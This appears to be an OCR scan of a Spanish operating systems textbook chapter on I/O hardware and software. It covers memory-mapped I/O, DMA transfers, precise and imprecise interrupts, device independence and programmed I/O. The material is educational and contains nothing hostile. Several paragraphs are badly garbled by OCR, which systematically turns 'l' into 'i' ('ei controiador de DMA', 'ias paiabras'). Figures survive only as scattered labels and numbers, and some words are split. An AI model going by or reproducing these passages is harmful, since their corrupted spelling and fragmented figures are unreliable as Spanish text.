ción especial para evitar que los procesos realicen operaciones de E/S. Todo lo que el sistema opera¬ 
tivo tiene que hacer es abstenerse de colocar esa porción del espacio de direcciones que contiene los 
registros de control en el espacio de direcciones virtuales de cualquier usuario. M ejor aún, si cada dis¬ 
positivo tiene sus registros de control en una página distinta del espacio de direcciones, el sistema ope¬ 
rativo puede proporcionar a un usuario el control sobre dispositivos específicos pero no el de los 
demás, con sólo incluirlas páginas deseadas en su tabla de páginas. Dicho esquema permite que se co¬ 
loquen distintos controladores de dispositivos en diferentes espacios de direcciones, lo cual no sólo 
reduce el tamaño del kernel, sino que también evita que un controlador interfiera con los demás. 

En tercer lugar, con la E/S por asignación de memoria, cada instrucción que puede hacer refe¬ 
rencia a la memoria también puede hacerla a los registros de control. Por ejemplo, si hay una instruc¬ 
ción llamada test que evalúe si una palabra de memoria esO, también se puede utilizar para evaluar 
si un registro de control es 0, lo cual podría ser la señal de que el dispositivo está inactivo y en po¬ 
sición de aceptar un nuevo comando. El código en lenguaje ensamblador podría ser así: 

CICLO: TESTPUERTO_4 //comprueba si el puerto 4 es 0 

BEQ LISTO //si es 0, ir a listo 

BRANCH CICLO //en caso contrario continúa la prueba 

LISTO: 

Si la E/S por asignación de memoria no está presente, el registro de control se debe leer primero en 
la CPU y después se debe evaluar, para lo cual se requieren dos instrucciones en vez de una. En el 
caso del ciclo antes mencionado, se tiene que agregar una cuarta instrucción, con lo cual se reduce 
ligeramente la capacidad de respuesta al detectar un dispositivo inactivo. 
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En el diseño de computadoras, casi todo impiica tener que hacer concesiones, y aquí también es 
ei caso. La E/S por asignación de memoria también tiene sus desventajas. En primer iugar, ia mayo¬ 
ría de ias computadoras actuaies tienen aiguna forma de coiocar en caché ias paiabras de memoria. 
Sería desastroso coiocar en caché un registro de controi de dispositivos. Considere ei cicio de código 
en i enguaje ensambiador antes mostrado en presencia de caché. La primera referencia a puerto_4 
haría que se coiocara en ia caché. Las referencias subsiguientes sóio tomarían ei vaior de ia caché sin 
siquiera preguntar ai dispositivo. Después, cuando ei dispositivo por fin estuviera iisto, ei software no 
tendría manera de averiguado. En vez deeiio, ei cicio continuaría para siempre. 

Para evitar esta situación reiacionada con ia E/S por asignación de memoria, ei hardware debe 
ser capaz de deshabiiitar ia caché en forma seiectiva; por ejempio, por página. Esta característica 
agrega una compiejidad adicionai ai hardware y ai sistema operativo, que tiene que encargarse de 
ia caché seiectiva. 

E n segundo iugar, si sóio hay un espacio de direcciones, entonces todos ios móduios de memo¬ 
ria y todos ios dispositivos de E/S deben examinar todas ias referencias a memoria para ver a cuá- 
ies debe responder. Si ia computadora tiene un soio bus, como en ia figura 5-3(a), es simpie hacer 
que todos anaiicen cada dirección. 


Las lecturas y escrituras de memoria de la CPU pasan 
a través de este bus con alto ancho de banda 



(a) (b) 


Figura 5-3. (a) A rquitectura con un solo bus. (b) A rquitectura con bus dual. 

Sin embargo, ia tendencia en ias computadoras personaies modernas es tener un bus de memoria 
dedicado de aita veiocidad, como se muestra en ia figura 5-3(b), una propiedad que también se en¬ 
cuentra incidentaimenteen ias mainframes. Este bus está ajustado para optimizar ei rendimiento de ia 
memoria sin sacrificarse por ei bienestar de ios dispositivos de E/S ientos. Los sistemas Pentium pue¬ 
den tener varios buses (memoria, PCI, SCSI, USB, ISA), como se muestra en la figura 1-12. 

El problema de tener un bus de memoria separado en equipos con asignación de memoria es 
que los dispositivos no tienen forma de ver las direcciones de memoria a medida que recorren el 
bus de memoria, por lo que no tienen manera de responderles. De nuevo es necesario tomar medi¬ 
das especiales para hacer que la E/S por asignación de memoria funcione en un sistema con varios 
buses. Una posibilidad es enviar primero todas las referencias de memoria a la memoria: si ésta no 
responde, entonces la CPU prueba los otros buses. Este diseño puede funcionar, pero requiere una 
complejidad adicional del hardware. 
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U n segundo posible diseño es colocar un dispositivo husmeador en el bus de memoria para pa¬ 
sar todas las direcciones presentadas a los dispositivos de E/S potencialmente interesados. El pro¬ 
blema aquí es que los dispositivos de E/S tal vez no puedan procesar las peticiones a la velocidad 
que puede procesarlas la memoria. 

Un tercer posible diseño, que es el utilizado en la configuración del Pentium de la figura 1-12, 
es filtrar las direcciones en el chip del puente PCI. Este chip contiene registros de rango que se car¬ 
gan previamente en tiempo de inicio del sistema. Por ejemplo, el rango de 640K a IM se podría 
marcar como un rango que no tiene memoria: las direcciones ubicadas dentro de uno de los rangos 
así marcados se reenvían al bus PCI, en vez de reenviarse a la memoria. La desventaja de este es¬ 
quema es la necesidad de averiguar en tiempo de inicio del sistema qué direcciones de memoria no 
lo son en realidad. Por ende, cada esquema tiene argumentos a favor y en contra, por lo que los sa¬ 
crificios y las concesiones son inevitables. 


5.1.4 Acceso directo a memoria (DMA) 

Sin importar que una CPU tenga o no E/S por asignación de memoria, necesita direccionar los con¬ 
troladores de dispositivos para intercambiar datos con ellos. La CPU puede solicitar datos de un 
controlador de E/S un bit a la vez, pero al hacerlo se desperdicia el tiempo de la CPU, por lo que a 
menudo se utiliza un esquema distinto, conocido como DMA (Acceso Directoa Memoria). El sis¬ 
tema operativo sólo puede utilizar DMA si el hardware tiene un controlador de DMA, que la ma¬ 
yoría de los sistemas tienen. Algunas veces este controlador está integrado a los controladores de 
disco y otros controladores, pero dicho diseño requiere un controlador de DMA separado para ca¬ 
da dispositivo. Lo más común es que haya un solo controlador de DMA disponible (por ejemplo, 
en la tarjeta principal) para regular las transferencias a varios dispositivos, a menudo en forma con¬ 
currente. 

Sin importar cuál sea su ubicación física, el controlador de DM A tiene acceso al bus del siste¬ 
ma de manera independiente de la CPU, como se muestra en la figura 5-4. Contiene varios regis¬ 
tros en los que la CPU puede escribir y leer; éstos incluyen un registro de dirección de memoria, un 
registro contador de bytes y uno o más registros de control. Los registros de control especifican el 
puerto de E/S a utilizar, la dirección de la transferencia (si se va a leer del dispositivo de E/S o se 
va a escribir en él), la unidad de transferencia (un byte a la vez o una palabra a la vez), y el núme¬ 
ro de bytes a transferir en una ráfaga. 

Para explicar el funcionamiento del DMA, veamos primero cómo ocurren las lecturas de disco 
cuando no se utiliza DMA. Primero, el controlador de disco lee el bloque (uno o más sectores) déla 
unidad en forma serial, bit por bit, hasta que se coloca todo el bloque completo en el búfer interno 
del controlador. Después calcula la suma de comprobación para verificar que no hayan ocurrido erro¬ 
res de lectura. Después, el controlador produce una interrupción. Cuando el sistema operativo em¬ 
pieza a ejecutarse, puede leer el bloque de disco del búfer del controlador, un byte o una palabra a la 
vez, mediante la ejecución de un ciclo en el que cada iteración se lee un byte o palabra de un regis¬ 
tro de dispositivo controlador y se almacena en la memoria principal. 

Cuando se utiliza DMA, el procedimiento es distinto. Primero, la CPU programa el controla¬ 
dor de DMA, para lo cual establece sus registros de manera que sepa qué debe transferir y a dónde 
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Figura 5-4. Operación de una transferencia de DMA. 


(paso 1 en la figura 5-4). También emite un comando al controlador de disco para indicarle que de¬ 
be leer datos del disco en su búfer interno y verificar la suma de comprobación. Cuando hay datos 
válidos en el búfer del controlador de disco, puede empezar el DMA. 

El controlador de DM A inicia la transferencia enviando una petición de lectura al controlador 
de disco mediante el bus (paso 2). Esta petición de lectura se ve como cualquier otra petición de 
lectura, por lo que el controlador de disco no sabe ni le importa si vino de la CPU o de un contro¬ 
lador de DMA. Por lo general, la dirección de memoria en la que se va a escribir está en las líneas 
de dirección del bus, por lo que cuando el controlador de disco obtiene la siguiente palabra de su 
búfer interno, sabe dónde escribir. La escritura en memoria es otro ciclo de bus estándar (paso 3). 
Cuando se completa la escritura, el controlador de disco envía una señal de reconocimiento al con¬ 
trolador de DMA, también a través del bus (paso 4). El controlador de DMA incrementa a conti¬ 
nuación la dirección de memoria a utilizar y disminuye la cuenta de bytes. Si la cuenta de bytes es 
aún mayor que 0, se repiten los pasos del 2 al 4 hasta que la cuenta llega a 0. En ese momento, el 
controlador de DMA interrumpe la CPU para hacerle saber que la transferencia está completa. 
Cuando el sistema operativo se inicia, no tiene que copiar el bloque de disco en la memoria: ya se 
encuentra ahí. 

Los controladores de DMA varían considerablemente en cuanto a su sofisticación. Los más 
simples manejan una transferencia a la vez, como se describió antes. Los más complejos se pueden 
programar para manejar varias transferencias a la vez. Dichos controladores tienen varios conjun¬ 
tos de registros internos, uno para cada canal. La CPU empieza por cargar cada conjunto de regis¬ 
tros con los parámetros relevantes para su transferencia. Cada transferencia debe utilizar un 
controlador de dispositivo distinto. Después de transferir cada palabra (los pasos 2 al 4) en la figu¬ 
ra 5-4, el controlador de DM A decide a cuál dispositivo va a dar servicio a continuación. Se puede 
configurar para utilizar un algoritmo por turno rotatorio (round-robin), o puede tener un diseño 
de esquema prioritario para favorecer a unos dispositivos sobre otros. Puede haber varias peticio¬ 
nes a distintos controladores de dispositivos pendientes al mismo tiempo, siempre y cuando haya 
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una manera ambigua de diferenciar ias señaies de reconocimiento. A menudo se utiiiza una iínea de 
reconocimiento distinta en ei bus para cada canai de DMA por esta razón. 

M uchos buses pueden operar en dos modos: ei modo de una paiabra a ia vez y ei modo de bio- 
que. Aigunos controiadores de DMA también pueden operar en cuaiquier modo. En ei modo ante¬ 
rior, i a operación es como se describe antes: ei controiadordeDMA soiicita ia transferencia de una 
paiabra y ia obtiene: si iaCPU también desea ei bus, tiene que esperar. Ei mecanismo seiiama ro¬ 
bo decido debido a que ei controiador de dispositivo se acerca de manera sigiiosa y roba un cicio 
de bus a ia CPU de vez en cuando, retrasándoia iigeramente. En ei modo debioque, ei controiador de 
DMA indica ai dispositivo que debe adquirir ei bus, emitir una serie de transferencias y después ii- 
berarei bus. Esta forma de operación se conoce como modo de ráfaga. Es más eficiente que ei ro¬ 
bo de cicio, debido a que ia adquisición dei bus requiere tiempo y se pueden transferir varias 
paiabras con sóio una adquisición de bus. La desventaja en comparación con ei modo de ráfaga 
es que puede bioquear ia CPU y otros dispositivos por un periodo considerabie, si se está transfi¬ 
riendo una ráfaga extensa. 

En ei modeio que hemos estado anaiizando, aigunas veces conocido como modo "fiy-by", ei 
controiador de DM A indica ai controiador de dispositivo que transfiera ios datos directamente a i a 
memoria principai. Un modo aiternativo que utiiizan aigunos controiadores de DMA es hacer que 
ei controiador de dispositivo envíe ia paiabra ai controiador de DMA, ei cuai emite después una 
segunda soiicitud de bus para escribir ia paiabra a donde se supone que debe ir. Este esquema re¬ 
quiere un cicio de bus adicionai por cada paiabra transferida, pero es más fiexibie en cuanto a que 
puede reaiizar también copias de dispositivo a dispositivo, e inciuso copias de memoria a memoria 
(para io cuai primero emite una iectura a memoria y después una escritura a memoria en una direc¬ 
ción distinta). 

La mayoría de ios controiadores de DMA utiiizan direcciones físicas de memoria para sus 
transferencias. Ei uso de direcciones físicas requiere que ei sistema operativo convierta ia dirección 
virtuai dei búfer de memoria deseado a una dirección física, y que escriba esta dirección física en 
ei registro de dirección dei controiador de DMA. Un esquema aiternativo que se utiiiza en unos 
cuantos controiadores de DMA es escribir direcciones virtuaies en ei controiador de DM A. Así, ei 
controiador de DM A debe utiiizar ia M M U para reaiizar ia traducción de dirección virtuai a física. 
Sóio en ei caso en que ia M M U sea parte de i a memoria (es posibie, pero raro) en vez de formar 
parte de ia CPU, ias direcciones virtuaies se podrán coi ocar en ei bus. 

Como io mencionamos anteriormente, antes de que pueda iniciar ei DMA, ei disco iee prime¬ 
ro ios datos en su búfer interno. Tai vez ei iector se pregunte por qué ei controiador no sóio ai ma¬ 
cona ios bytes en memoria tan pronto como ios obtiene dei disco. En otras paiabras, ¿para qué 
necesita un búfer interno? Hay dos razones: en primer iugar, ai utiiizar ei búfer interno, ei contro¬ 
iador de disco puede verificar ia suma de comprobación antes de iniciar una transferencia y si ia su¬ 
ma de comprobación es incorrecta se señaia un error y no se reaiiza ia transferencia: ia segunda es 
que, una vez que se inicia una transferencia de disco, ios bits siguen iiegando a una veiocidad cons¬ 
tante, esté i i sto o no ei controi ador para ei i os. S i ei controi ador tratara de escri bi r datos di rectamen¬ 
te en ia memoria, tendría que pasar por ei bus dei sistema por cada paiabra transferida. Si ei bus 
estuviera ocupado debido a que aigún otro dispositivo io estuviera utiiizando (por ejempio, en mo¬ 
do ráfaga), ei controiador tendría que esperar. Si ia siguiente paiabra dei disco iiegar antes de que 
se aimacenara ia anterior, ei controiador tendría que aimacenaria en aigún otro iado. Si ei busestu- 
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viera muy ocupado, el controlador podría terminar almacenando muy pocas palabras y tendría que 
realizar también mucho trabajo de administración. Cuando el bloque se coloca en un búfer interno, 
el bus no se necesita sino hasta que empieza el DMA, por lo que el diseño del controlador es mu¬ 
cho más simple debido a que la transferencia de DMA a la memoria no es muy estricta en cuanto 
al tiempo (de hecho, algunos controladores antiguos van directamente a la memoria con sólo una 
pequeña cantidad de uso del búfer interno, pero cuando el bus está muy ocupado, tal vez haya que 
terminar una transferencia con un error de desbordamiento). 

No todas las computadoras utilizan DMA. El argumento en contra es que la CPU principal es 
a menudo más rápida que el controlador de DMA y puede realizar el trabajo con mucha mayor fa¬ 
cilidad (cuando el factor limitante no es la velocidad del dispositivo de E/S). Si no hay otro traba¬ 
jo que realizar, hacer que la CPU (rápida) tenga que esperar al controlador de DMA (lento) para 
terminar no tiene caso. Además, al deshacernos del controlador de DMA y hacer que la CPU reali¬ 
ce todo el trabajo en software se ahorra dinero, lo cual es importante en las computadoras de bajo 
rendimiento (incrustadas o embebidas). 

5.1.5 Repaso de las interrupciones 

En la sección 1.4.5 vimos una introducción breve a las interrupciones, pero hay más que decir. En 
un sistema de computadora personal común, la estructura de las interrupciones es como se muestra 
en la figura 5-5. A nivel de hardware, las interrupciones funcionan de la siguiente manera. Cuando 
un dispositivo de E/S ha terminado el trabajo que se le asignó, produce una interrupción (suponien¬ 
do que el sistema operativo haya habilitado las interrupciones). Para ello, impone una señal en una 
línea de bus que se le haya asignado. Esta señal es detectada por el chip controlador de interrupcio¬ 
nes en la tarjeta principal, que después decide lo que debe hacer. 



Figura 5-5. Cómo ocurre una interrupción. Las conexiones entre los dispositivos y el 
controlador de interrupciones en realidad utilizan líneas de interrupción en el bus, en 
vez de cables dedicados. 


Si no hay otras interrupciones pendientes, el controlador de interrupciones procesa la interrup¬ 
ción de inmediato. Si hay otra en progreso, o si otro dispositivo ha realizado una petición simultá¬ 
nea en una línea de petición de interrupción de mayor prioridad en el bus, el dispositivo sólo se 
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ignora por el momento. En este caso, continúa imponiendo una señal de interrupción en el bus has¬ 
ta que la CPU la atiende. 

Para manejar la interrupción, el controlador coloca un número en las líneas de dirección que 
especifican cuál dispositivo desea atención e impone una señal para interrumpir a la CPU. 

La señal de interrupción hace que la CPU deje lo que está haciendo y empiece a hacer otra co¬ 
sa. El número en las líneas de dirección se utiliza como índice en una tabla llamada vector de in¬ 
terrupciones para obtener un nuevo contador del programa. Este contador del programa apunta al 
inicio del procedimiento de servicio de interrupciones correspondiente. Por lo general, las trampas 
e interrupciones utilizan el mismo mecanismo desde este punto en adelante, y con frecuencia com¬ 
parten el mismo vector de interrupción. La ubicación del vector de interrupción se puede determi¬ 
nar de manera estática (hardwired) en la máquina, o puede estar en cualquier parte de la memoria, 
con un registro de la CPU (cargado por el sistema operativo) apuntando a su origen. 

Poco después de que se empieza a ejecutar, el procedimiento de servicio de interrupciones re¬ 
conoce la interrupción al escribir cierto valor en uno de los puertos de E/S del controlador de inte¬ 
rrupciones. Este reconocimiento indica al controlador que puede emitir otra interrupción. Al hacer 
que la CPU retrase este reconocimiento hasta que esté lista para manejar la siguiente interrupción, 
se pueden evitar las condiciones de competencia que involucran varias interrupciones (casi simul¬ 
táneas). Por otra parte, algunas computadoras (antiguas) no tienen un controlador de interrupciones 
centralizado, por lo que cada controlador de dispositivo solicita sus propias interrupciones. 

El hardware siempre guarda cierta información antes de iniciar el procedimiento de servicio. 
L a información que se guarda y el lugar en donde se guarda varía de manera considerable, entre una 
CPU y otra. Como mínimo se debe guardar el contador del programa para que se pueda reiniciar el 
proceso interrumpido. En el otro extremo, todos los registros visibles y un gran número de registros 
internos se pueden guardar también. 

Una cuestión es dónde guardar esta información. Una opción es colocarla en registros internos que 
el sistema operativo pueda leer según sea necesario. Un problema derivado de este método es que en¬ 
tonces el controlador de interrupciones no puede recibir una señal de reconocimiento sino hasta que se 
haya leído toda la información potencial mente relevante, por temor a que una segunda interrupción so¬ 
brescriba los registros internos que guardan el estado. Esta estrategia conlleva tiempos inactivos más lar¬ 
gos cuando se deshabilitan las interrupciones, y posiblemente interrupciones y datos perdidos. 

En consecuencia, la mayoría de las CPUs guardan la información en la pila. Sin embargo, es¬ 
te método también tiene problemas. Para empezar, ¿la pila de quién? Si se utiliza la pila actual, po¬ 
dría muy bien ser una pila de un proceso de usuario. El apuntador a la pila tal vez ni siquiera sea 
legal, lo cual produciría un error fatal cuando el hardware tratara de escribir ciertas palabras en la 
dirección a la que estuviera apuntando. Además, podría apuntar al final de una página. Después de 
varias escrituras en memoria, se podría exceder el límite de página y generar un fallo de página. Al 
ocurrir un fallo de página durante el procesamiento de la interrupción de hardware se crea un ma¬ 
yor problema: ¿Dónde se debe guardar el estado para manejar el fallo de página? 

Si se utiliza la pila del kernel, hay una probabilidad mucho mayor de que el apuntador de la pi¬ 
la sea legal y que apunte a una página marcada. Sin embargo, para cambiar al modo kernel tal vez se 
requiera cambiar de contextos de la M M U, y probablemente se invalide la mayoría de (o toda) la ca¬ 
ché y el TLB. Si se vuelven a cargar todos estos, ya sea en forma estática o dinámica, aumenta el 
tiempo requerido para procesar una interrupción, y por ende se desperdiciará tiempo de la CPU. 
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I nterrupciones precisas e imprecisas 

Otro problema es ocasionado por el hecho deque la mayoría de las CPU s modernas tienen muchas 
líneas de tuberías y a menudo son superescalares (paralelas en su interior). En los sistemas antiguos, 
después de que cada instrucción terminaba de ejecutarse, el microprograma o hardware comproba¬ 
ba si había una interrupción pendiente. De ser así, el contador del programa y el PSW se metían en 
la pila y empezaba la secuencia de interrupción. U na vez que se ejecutaba el manejador de interrup¬ 
ciones, se llevaba a cabo el proceso inverso, en donde el PSW antiguo y el contador del programa 
se sacaban de la pila y continuaba el proceso anterior. 

Este modelo hace la suposición implícita de que si ocurre una interrupción justo después de 
cierta instrucción, todas las instrucciones hasta (e incluyendo) esa instrucción se han ejecutado por 
completo, y no se ha ejecutado ninguna instrucción después de ésta. En equipos antiguos, esta su¬ 
posición siempre era válida. En los modernos tal vez no sea así. 

Para empezar, considere el modelo de línea de tubería de la figura l-7(a).¿Qué pasa si ocurre 
una interrupción mientras la línea de tubería está llena (el caso usual)? M uchas instrucciones se en¬ 
cuentran en varias etapas de ejecución. Cuando ocurre la interrupción, el valor del contador del pro¬ 
grama tal vez no refleje el límite correcto entre las instrucciones ejecutadas y las no ejecutadas. De 
hecho, muchas instrucciones pueden haberse ejecutado en forma parcial, y distintas instrucciones 
podrían estar más o menos completas. En esta situación, el contador del programa refleja con más 
probabilidad la dirección de la siguiente instrucción a obtener y meter en la línea de tubería, en vez 
de la dirección de la instrucción que acaba de ser procesada por la unidad de ejecución. 

En una máquina superescalar, como la de la figura l-7(b), las cosas empeoran. Las instruccio¬ 
nes se pueden descomponer en microoperaciones y éstas se pueden ejecutar en desorden, dependien¬ 
do de la disponibilidad de los recursos internos como las unidades funcionales y los registros. Al 
momento de una interrupción, algunas instrucciones iniciadas hace tiempo tal vez no hayan empeza¬ 
do, y otras que hayan empezado más recientemente pueden estar casi completas. AI momento en que 
se señala una interrupción, puede haber muchas instrucciones en varios estados de avance, con me¬ 
nos relación entre ellas y el contador del programa. 

Una interrupción que deja al equipo en un estado bien definido se conoce como interrupción 
precisa (Waikery Cragon, 1995). Dicha interrupción tiene cuatro propiedades: 

1. El contador del programa (PC) se guarda en un lugar conocido. 

2. Todas las instrucciones antes de la instrucción a la que apunta el PC se han ejecutado por 
completo. 

3. Ninguna instrucción más allá de la instrucción a la que apunta el PC se ha ejecutado. 

4. Se conoce el estado de ejecución de la instrucción a la que apunta el PC. 

Observe que no hay prohibición sobre las instrucciones más allá de la instrucción a la que apun¬ 
ta el PC acerca de si pueden iniciar o no. Es sólo que los cambios que realizan a los registros o la 
memoria se deben deshacer antes de que ocurra la interrupción. Se permite ejecutar la instrucción 
a la que se apunta. También se permite que no se haya ejecutado. Sin embargo, debe estar claro cuál 
es el caso que se aplica. A menudo, si la interrupción es de E/S, todavía no habrá empezado. No 
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obstante, si la interrupción es en realidad una trampa o fallo de página, entonces el PC generalmen¬ 
te apunta a la instrucción que ocasionó el fallo, por lo que puede reiniciarse después. La situación 
de la figura 5-6(a) ilustra una interrupción precisa. Todas las instrucciones hasta el contador del pro¬ 
grama (316) se han completado, y ninguna más allá de éstas ha iniciado (o se ha rechazado para 
deshacer sus efectos). 


PC 


No se ha ejecutado 
No se ha ejecutado 
No se ha ejecutado 
No se ha ejecutado 
Se ejecutó por completo" 

Se ejecutó por completo 
Se ejecutó por completo 
Se ejecutó por completo 


332 

328 

324 

320 

316 PC 

312 

308 

304 

300 


(a) 


No se ha ejecutado 
Se ejecutó un 10% 

Se ejecutó un 40% 

Se ejecutó un 35% 

Se ejecutó un 20% 

Se ejecutó un 60% 

Se ejecutó un 80% 

Se ejecutó por completo 
(b) 


332 

328 

324 

320 

316 

312 

308 

304 

300 


Figura 5-6. (a) Una interrupción precisa, (b) Una interrupción imprecisa. 


Una interrupción que no cumple con estos requerimientos se conoce como interrupción im¬ 
precisa y hace la vida muy incómoda para el escritor del sistema operativo, que entonces tiene que 
averiguarlo que ocurrió y lo que aún está por ocurrir. La figura 5-6(b) muestra una interrupción im¬ 
precisa, en donde hay distintas instrucciones cerca del contador del programa en distintos estados 
de avance, y las más antiguas no necesariamente están más completas que las más recientes. Las 
máquinas con interrupciones imprecisas por lo general vuelcan una gran cantidad de estado interno 
en la pila, para dar al sistema operativo la posibilidad de averiguar qué está pasando. El código ne¬ 
cesario para reiniciar la máquina es por lo general muy complicado. Además, al guardar una canti¬ 
dad extensa de información para la memoria en cada interrupción se reduce aún más la velocidad 
de las interrupciones y la recuperación. Esto conlleva a una irónica situación en la que se tienen 
CPUs superescalares muy veloces, que algunas veces no son adecuadas para el trabajo real debido 
a la lentitud de las interrupciones. 

Algunas computadoras están diseñadas de manera que ciertos tipos de interrupciones y tram¬ 
pas (traps) sean precisas y otras no. Por ejemplo, hacer que las interrupciones de E/S sean precisas, 
pero que las trampas producidas por errores de programación fatales sean imprecisas no es tan ma¬ 
lo, ya que no hay necesidad de intentar reiniciar un proceso en ejecución una vez que ha dividido 
entre cero. A Igunas máquinas tienen un bit que se puede establecer para forzar a que todas las inte¬ 
rrupciones sean precisas. La desventaja de establecer este bit es que obliga a la CPU a registrar cui¬ 
dadosamente todo lo que está haciendo, y a mantener copias "sombra" de los registros para que 
pueda generar una interrupción precisa en cualquier instante. Toda esta sobrecarga tiene un gran im¬ 
pacto sobre el rendimiento. 

Algunas máquinas superescalares como la serie Pentium tienen interrupciones precisas para 
permitir que el software antiguo funcione correctamente. El precio a pagar por las interrupciones 
precisas es una lógica de interrupciones en extremo compleja dentro de la CPU necesaria para ase¬ 
gurar que cuando el controlador de interrupciones indique que desea ocasionar una interrupción. 
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todas las instrucciones hasta cierto punto puedan terminar y ninguna más aiiá de ese punto pueda 
tener un efecto considerabie sobre ei estado de ia máquina. Aquí ei precio no se paga con tiempo, 
sino en área dei chip y en ia compiejidad dei diseño. Si no se requirieran interrupciones precisas pa¬ 
ra fines de compatibiiidad con apiicaciones antiguas, esta área dei chip estaría disponibie para ca- 
chés en chip más grandes, haciendo a ia CPU más veioz. Por otra parte, ias interrupciones hacen 
que ei sistema operativo sea mucho más compiicado y iento, por io que es difícii saber qué método 
es mejor en reai i dad. 


5.2 FUNDAMENTOS DEL SOFTWARE DE E/S 

Ahora vamos a aiejamos dei hardware de E/S para anaiizar ei software de E/S. Primero anaiizare- 
mos ios objetivos dei software de E/S y después ias distintas formas en que se puede reaiizar ia E/S 
desde ei punto de vista dei sistema operativo. 

5.2.1 Objetivos del software de E/S 

Un concepto ciaveen ei diseño dei software de E/S se conoce como independencia de dispositivos. 
Lo que significa es que debe ser posibie escribir programas que puedan acceder a cuaiquier disposi¬ 
tivo de E/S sin tener que especificar ei dispositivo por adeiantado. Por ejempio, un programa que iee 
un archivo como entrada debe tener ia capacidad de ieer un archivo en ei disco duro, un CD-ROM , un 
DVD o una memoria USB sin tener que modificar ei programa para cada dispositivo distinto. De ma¬ 
nera simiiar, debe ser posibie escribir un comando tai como 

sort <entrada> salida 

y hacer que funcione con datos de entrada provenientes de cuaiquier tipo de disco o dei teciado, y 
que ios datos de saiida vayan a cuaiquier tipo de disco o a ia pantaiia. Depende dei sistema opera¬ 
tivo encargarse de ios probiemas producidos por ei hecho de que estos dispositivos en reai idad son 
diferentes y requieren secuencias de comandos muy distintas para ieer o escribir. 

Un objetivo muy reiacionado con ia independencia de ios dispositivos es ia denominación uni¬ 
forme. Ei nombre de un archivo o dispositivo simpiemente debe ser una cadena o un entero sin de¬ 
pender dei dispositivo de ninguna forma. En UNIX, todos los discos se pueden integrar en la 
jerarquía del sistema de archivos de maneras arbitrarias, por lo que el usuario no necesita estar al 
tanto de cuál nombre corresponde a cuál dispositivo. Por ejemplo, una memoria USB se puede 
montar encima del directorio /usr/ast/respaldo, de manera que al copiar un archivo a /usr/ast/res- 
paldo/lunes, este archivo se copie a la memoria USB. De esta forma, todos los archivos y disposi¬ 
tivos se direccionan de la misma forma: mediante el nombre de una ruta. 

Otra cuestión importante relacionada con el software de E/S es el manqo de errores. En ge¬ 
neral, los errores se deben manejarlo más cerca del hardware que sea posible. Si el controlador des¬ 
cubre un error de lectura, debe tratar de corregir el error por sí mismo. Si no puede, entonces el 
software controlador del dispositivo debe manejarlo, tal vez con sólo tratar de leer el bloque de nue¬ 
vo. M uchos errores son transitorios, como los errores de lectura ocasionados por pizcas de polvo en 
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la cabeza de lectura, y comúnmente desaparecen si se repite la operación. Sólo si los niveles inferio¬ 
res no pueden lidiar con el problema, los niveles superiores deben saber acerca de ello. En muchos 
casos, la recuperación de los errores se puede hacer de manera transparente a un nivel bajo, sin que 
los niveles superiores se enteren siquiera sobre el error. 

Otra cuestión clave es la de las transferencias síncronas (de bloqueo) contra las asincronas 
(controladas por interrupciones). La mayoría de las operaciones de E/S son asincronas: la CPU ini¬ 
cia la transferencia y se va a hacer algo más hasta que llega la interrupción. Los programas de usua¬ 
rio son mucho más fáciles de escribir si las operaciones de E/S son de bloqueo: después de una 
llamada al sistema read, el programa se suspende de manera automática hasta que haya datos dis¬ 
ponibles en el búfer. Depende del sistema operativo hacer que las operaciones que en realidad son 
controladas por interrupciones parezcan de bloqueo para los programas de usuario. 

Otra cuestión relacionada con el software de E/S es el uso de búfer. A menudo los datos que 
provienen de un dispositivo no se pueden almacenar directamente en su destino final. Por ejemplo, 
cuando un paquete llega de la red, el sistema operativo no sabe dónde colocarlo hasta que ha alma¬ 
cenado el paquete en alguna parte y lo examina. Además, algunos dispositivos tienen severas res¬ 
tricciones en tiempo real (por ejemplo, los dispositivos de audio digital), por lo que los datos se 
deben colocar en un búfer de salida por adelantado para desacoplar la velocidad a la que se llena el 
búfer, de la velocidad a la que se vacía, de manera que se eviten sub-desbordamientos de búfer. El 
uso de búfer involucra una cantidad considerable de copiado y a menudo tiene un importante im¬ 
pacto en el rendimiento de la E/S. 

El concepto final que mencionaremos aquí es la comparación entre los dispositivos comparti¬ 
dos y los dispositivos dedicados. Algunos dispositivos de E/S, como los discos, pueden ser utilizados 
por muchos usuarios a la vez. No se producen problemas debido a que varios usuarios tengan ar¬ 
chivos abiertos en el mismo disco al mismo tiempo. Otros dispositivos, como las unidades de cin¬ 
ta, tienen que estar dedicados a un solo usuario hasta que éste termine. Después, otro usuario puede 
tener la unidad de cinta. Si dos o más usuarios escriben bloques entremezclados al azar en la mis¬ 
ma cinta, definitivamente no funcionará. Al introducir los dispositivos dedicados (no compartidos) 
también se introduce una variedad de problemas, como los interbloqueos. De nuevo, el sistema 
operativo debe ser capaz de manejar los dispositivos compartidos y dedicados de una manera que 
evite problemas. 


5.2.2 E/S programada 

Hay tres maneras fundamentalmente distintas en que se puede llevar a cabo la E/S. En esta sección 
analizaremos la primera (E/S programada). En las siguientes dos secciones examinaremos las otras 
(E/S controlada por interrupciones y E/S mediante el uso de DMA). La forma más simple de E/S 
es cuando la CPU hace todo el trabajo. A este método se le conoce como E/S programada. 

Es más simple ilustrar la E/S programada por medio de un ejemplo. Considere un proceso de 
usuario que desea imprimir la cadena de ocho caracteres "ABCDEFGH" en la impresora. Primero 
ensambla la cadena en un búfer en espacio de usuario, como se muestra en la figura 5-7(a). 

Después el proceso de usuario adquiere la impresora para escribir, haciendo una llamada al sis¬ 
tema para abrirla. Si la impresora está actualmente siendo utilizada por otro proceso, esta llamada 
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Espacio 
de usuario*^ 


Espacio ^ 
de kernei"^ 



(a) 


(b) 


Figura 5-7. Pasos para imprimir una cadena. 



(O 


fallará y devolverá un código de error o se bloqueará hasta que la impresora esté disponible, depen¬ 
diendo del sistema operativo y los parámetros de la llamada. Una vez que obtiene la impresora, el 
proceso de usuario hace una llamada al sistema para indicar al sistema operativo que imprima la ca¬ 
dena en la impresora. 

Después, el sistema operativo por lo general copia el búfer con la cadena a un arreglo, por 
ejemplo, p en espacio de kernel, donde se puede utilizar con más facilidad (debido a que el kernel 
tal vez tenga que modificar el mapa de memoria para tener acceso al espacio de usuario). Después 
comprueba si la impresora está disponible en ese momento. Si no lo está, espera hasta que lo esté. 
Tan pronto como la impresora está disponible, el sistema operativo copia el primer carácter al re¬ 
gistro de datos de la impresora, en este ejemplo mediante el uso de E/S por asignación de memo¬ 
ria. Esta acción activa la impresora. El carácter tal vez no aparezca todavía, debido a que algunas 
impresoras colocan en búfer una línea o una página antes de imprimir algo. No obstante, en la fi¬ 
